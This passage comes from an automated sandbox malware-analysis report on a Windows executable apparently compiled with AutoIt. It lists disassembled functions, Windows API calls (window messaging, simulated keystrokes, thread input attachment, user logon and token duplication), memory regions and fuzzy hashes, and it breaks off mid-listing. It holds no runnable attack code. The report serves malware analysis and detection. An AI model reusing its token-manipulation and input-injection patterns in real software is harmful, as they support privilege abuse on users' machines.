                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: a66b98467020a5530ef098d087997506807d2f829ec1bf9c23c2854c62332ec2
                          • Instruction ID: d9f22e04d88faa2c511b7c373c64ee77361e3e950348358c09e40a758c016367
                          • Opcode Fuzzy Hash: a66b98467020a5530ef098d087997506807d2f829ec1bf9c23c2854c62332ec2
                          • Instruction Fuzzy Hash: 6EF0B432602234A6FB295F62AC09B5A3798BF417A0F15A122F815A6293CA7CFC0146B0
                          Function 00733820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 69dfc540eeb7ec40c48798bc79d0d85d3a6d3c032fdd34ecea490107c900058b
                          • Instruction ID: 7521abc1d9ed14c51fa501d822f4f1fea89f9fee13eaa1cb9b8f63b72a2c2aaf
                          • Opcode Fuzzy Hash: 69dfc540eeb7ec40c48798bc79d0d85d3a6d3c032fdd34ecea490107c900058b
                          • Instruction Fuzzy Hash: 3BE0E532101234AAFA312A66AC05BDA3758AF427B0F050022FC04A25A2CB1DDD0281F8
                          Function 00704F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704F6D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 75c604bbaaf3983eeeae4a949e988a8717622e8c8892173e683fa1e03ce3b287
                          • Instruction ID: 4db22098ba80fc688c94f75b5ac8787187a3293a1d415b2f12e44605fba4fa29
                          • Opcode Fuzzy Hash: 75c604bbaaf3983eeeae4a949e988a8717622e8c8892173e683fa1e03ce3b287
                          • Instruction Fuzzy Hash: 9CF030B1105752CFDB349F64E494822B7E4EF143193188A7EE3DA82551C779A844DF10
                          Function 00702DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00702DC4
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LongNamePath_wcslen
                          • String ID:
                          • API String ID: 541455249-0
                          • Opcode ID: a73ce5a10fb14efff8817d70f1b1d743034feb1557a5d3da3c1b2be837a1f098
                          • Instruction ID: 27c0f9e29a5d8daf6498e633b4166fcf12af5742ce933d77dcd0e3b952953ff7
                          • Opcode Fuzzy Hash: a73ce5a10fb14efff8817d70f1b1d743034feb1557a5d3da3c1b2be837a1f098
                          • Instruction Fuzzy Hash: 69E0CDB26001249BCB11E7589C09FDA77EDDFC8790F054171FD09D7248DA64AD858550
                          Function 00772693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID:
                          • API String ID: 2638373210-0
                          • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction ID: 81c8753999cb9cbf75b6350cd5a54e2b8ac0c0b56389a458e737d69a377dd91a
                          • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                          • Instruction Fuzzy Hash: B0E04FB0609B009FDF3D5A28A8517B677E89F49340F00486EF6AFC2653E57278868A4D
                          Function 00702B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00703837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00703908
                            • Part of subcall function 0070D730: GetInputState.USER32 ref: 0070D807
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00702B6B
                            • Part of subcall function 007030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0070314E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$CurrentDirectoryInputState
                          • String ID:
                          • API String ID: 3667716007-0
                          • Opcode ID: 97ba2ec492a07caaf123053c8efa2522f1c12a5bb9137a1bee13278dec0ff146
                          • Instruction ID: a0372b331140ac0fc691f83e6959d9226e4edeaf38b6dae853b6fe66a2afc86e
                          • Opcode Fuzzy Hash: 97ba2ec492a07caaf123053c8efa2522f1c12a5bb9137a1bee13278dec0ff146
                          • Instruction Fuzzy Hash: EBE08662304244D7CA04BBB4985A57DB7DD9BD1351F40573FF142432E3DE2C49464252
                          Function 025308E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 025308EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                          • Instruction ID: 0f8d4b9e0cf2a2c75acfa6d8215d997a400b1ddc1b372ccb2e2a99e7067ab747
                          • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                          • Instruction Fuzzy Hash: A8E0C272A0530CEBEB21CBBCDC08AAE77A8FB04320F004B54F81AC32C0D6308A40D758
                          Function 025308B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?), ref: 025308BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                          • Instruction ID: 788527f6d940bafbea5d29d46b16566bec938dad0d7f3249c3028c471eeb8e2f
                          • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                          • Instruction Fuzzy Hash: 77D0A73090630CEBCB10CFB89C04ADAB7A8EB04330F004754FD15D32C0D63199409794
                          Function 0074039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(00000000,00000000,?,00740704,?,?,00000000,?,00740704,00000000,0000000C), ref: 007403B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 48229f700b6d0411db6ee197a228b00e7d218df2bb1a6fb5d24e90e5bd367312
                          • Instruction ID: 277f44f106ebd114c53dd7436127ff0e821b0d458e9fc318f432b37aee4c1359
                          • Opcode Fuzzy Hash: 48229f700b6d0411db6ee197a228b00e7d218df2bb1a6fb5d24e90e5bd367312
                          • Instruction Fuzzy Hash: 03D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C736E822AB98
                          Function 00701CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00701CBC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: InfoParametersSystem
                          • String ID:
                          • API String ID: 3098949447-0
                          • Opcode ID: 753c7ef9f1badbe84d56a3d9c76acca532267d24d2cc4c5e645a5c7fb3125c88
                          • Instruction ID: b1b6fb201874068e682ace97bd3e0bbc021a85b1825b02652cd074928f073bb0
                          • Opcode Fuzzy Hash: 753c7ef9f1badbe84d56a3d9c76acca532267d24d2cc4c5e645a5c7fb3125c88
                          • Instruction Fuzzy Hash: A3C09B35281304AFF6154784BC5BF107774A358B00F54C003F609555E3C3A51431D658
                          Function 0077744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00705745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00705773
                          • GetLastError.KERNEL32(00000002,00000000), ref: 007776DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateErrorFileLast
                          • String ID:
                          • API String ID: 1214770103-0
                          • Opcode ID: 1e64b1a89337e43d7de98ccdbc012f704f9c3ce4592e65c7b761e85beb48638e
                          • Instruction ID: d20b79c608d3b1fbc1500d4a7c04db1f72482f823989b51dbc7108f863db5156
                          • Opcode Fuzzy Hash: 1e64b1a89337e43d7de98ccdbc012f704f9c3ce4592e65c7b761e85beb48638e
                          • Instruction Fuzzy Hash: E3817230608701DFCB19EF28C495A69B7E1BF49354F04865DF88A9B2D2DB38AD45CB92
                          Function 0071FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: afcec2a5ce6bb7006ed8928729a84ed38ebb066c1480d7245a1d3107416923cd
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: 83310674A00109DBC718DF5DE4909A9F7A1FF89300B2486A5E84ACF695D735EDC1DBD0
                          Function 025322B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 025322C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction ID: 3e04ed417243eb81785538d1c8a46bd56390a10d8d14c1beddf0ebaf76fdd08a
                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                          • Instruction Fuzzy Hash: 2EE0E67494010DDFDB00EFB4D94969E7FB4FF04301F100161FD01D2280D6309D508A62

                          Non-executed Functions

                          Function 00799576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0079961A
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079965B
                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0079969F
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007996C9
                          • SendMessageW.USER32 ref: 007996F2
                          • GetKeyState.USER32(00000011), ref: 0079978B
                          • GetKeyState.USER32(00000009), ref: 00799798
                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007997AE
                          • GetKeyState.USER32(00000010), ref: 007997B8
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007997E9
                          • SendMessageW.USER32 ref: 00799810
                          • SendMessageW.USER32(?,00001030,?,00797E95), ref: 00799918
                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0079992E
                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00799941
                          • SetCapture.USER32(?), ref: 0079994A
                          • ClientToScreen.USER32(?,?), ref: 007999AF
                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007999BC
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007999D6
                          • ReleaseCapture.USER32 ref: 007999E1
                          • GetCursorPos.USER32(?), ref: 00799A19
                          • ScreenToClient.USER32(?,?), ref: 00799A26
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00799A80
                          • SendMessageW.USER32 ref: 00799AAE
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00799AEB
                          • SendMessageW.USER32 ref: 00799B1A
                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00799B3B
                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00799B4A
                          • GetCursorPos.USER32(?), ref: 00799B68
                          • ScreenToClient.USER32(?,?), ref: 00799B75
                          • GetParent.USER32(?), ref: 00799B93
                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00799BFA
                          • SendMessageW.USER32 ref: 00799C2B
                          • ClientToScreen.USER32(?,?), ref: 00799C84
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00799CB4
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00799CDE
                          • SendMessageW.USER32 ref: 00799D01
                          • ClientToScreen.USER32(?,?), ref: 00799D4E
                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00799D82
                            • Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952
                          • GetWindowLongW.USER32(?,000000F0), ref: 00799E05
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                          • String ID: @GUI_DRAGID$F$p#}
                          • API String ID: 3429851547-3317532684
                          • Opcode ID: 28ddc294a7697689253a7e24d7c92c40c5c85117e7a023da9a3a49c4a5a26550
                          • Instruction ID: 8552649ccd0e769501ced7890e6c1a130604db29f6370fbed31be11f0984fcb7
                          • Opcode Fuzzy Hash: 28ddc294a7697689253a7e24d7c92c40c5c85117e7a023da9a3a49c4a5a26550
                          • Instruction Fuzzy Hash: 4442AD31204240EFEB25CF68DC48AAABBF5FF49310F10465EF699872A1D739E891CB55
                          Function 00794873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007948F3
                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00794908
                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00794927
                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0079494B
                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0079495C
                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0079497B
                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007949AE
                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007949D4
                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00794A0F
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00794A56
                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00794A7E
                          • IsMenu.USER32(?), ref: 00794A97
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00794AF2
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00794B20
                          • GetWindowLongW.USER32(?,000000F0), ref: 00794B94
                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00794BE3
                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00794C82
                          • wsprintfW.USER32 ref: 00794CAE
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00794CC9
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00794CF1
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00794D13
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00794D33
                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00794D5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                          • String ID: %d/%02d/%02d
                          • API String ID: 4054740463-328681919
                          • Opcode ID: 34e0857b6bdbbf14dbaadf8e1ff9a82fe7c81b9e3005ae1703360cf3177f5452
                          • Instruction ID: 99a6c77eb65ec6794f474a72c9535e37b6cd1d25f93c02eac200b07796faebef
                          • Opcode Fuzzy Hash: 34e0857b6bdbbf14dbaadf8e1ff9a82fe7c81b9e3005ae1703360cf3177f5452
                          • Instruction Fuzzy Hash: CF12EF71600215ABEF258F28EC49FAE7BF8EF45310F14816AF515EA2E1DB789942CB50
                          Function 0071F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0071F998
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0075F474
                          • IsIconic.USER32(00000000), ref: 0075F47D
                          • ShowWindow.USER32(00000000,00000009), ref: 0075F48A
                          • SetForegroundWindow.USER32(00000000), ref: 0075F494
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075F4AA
                          • GetCurrentThreadId.KERNEL32 ref: 0075F4B1
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0075F4BD
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0075F4CE
                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0075F4D6
                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0075F4DE
                          • SetForegroundWindow.USER32(00000000), ref: 0075F4E1
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F4F6
                          • keybd_event.USER32(00000012,00000000), ref: 0075F501
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F50B
                          • keybd_event.USER32(00000012,00000000), ref: 0075F510
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F519
                          • keybd_event.USER32(00000012,00000000), ref: 0075F51E
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0075F528
                          • keybd_event.USER32(00000012,00000000), ref: 0075F52D
                          • SetForegroundWindow.USER32(00000000), ref: 0075F530
                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0075F557
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                          • String ID: Shell_TrayWnd
                          • API String ID: 4125248594-2988720461
                          • Opcode ID: d4604cd1655c97099567a36da721b976ee5afae75c8d63810b0100b94d68f20c
                          • Instruction ID: 61a340a3037905115773d19141d0f9bfed7a53a3838065a0082c20edcabbf738
                          • Opcode Fuzzy Hash: d4604cd1655c97099567a36da721b976ee5afae75c8d63810b0100b94d68f20c
                          • Instruction Fuzzy Hash: 9531A071A40318BFEF216BB55C4AFBF7E6CEB44B50F204066FA00E61D1D6B85D11AAA4
                          Function 00761201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
                            • Part of subcall function 007616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
                            • Part of subcall function 007616C3: GetLastError.KERNEL32 ref: 0076174A
                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00761286
                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007612A8
                          • CloseHandle.KERNEL32(?), ref: 007612B9
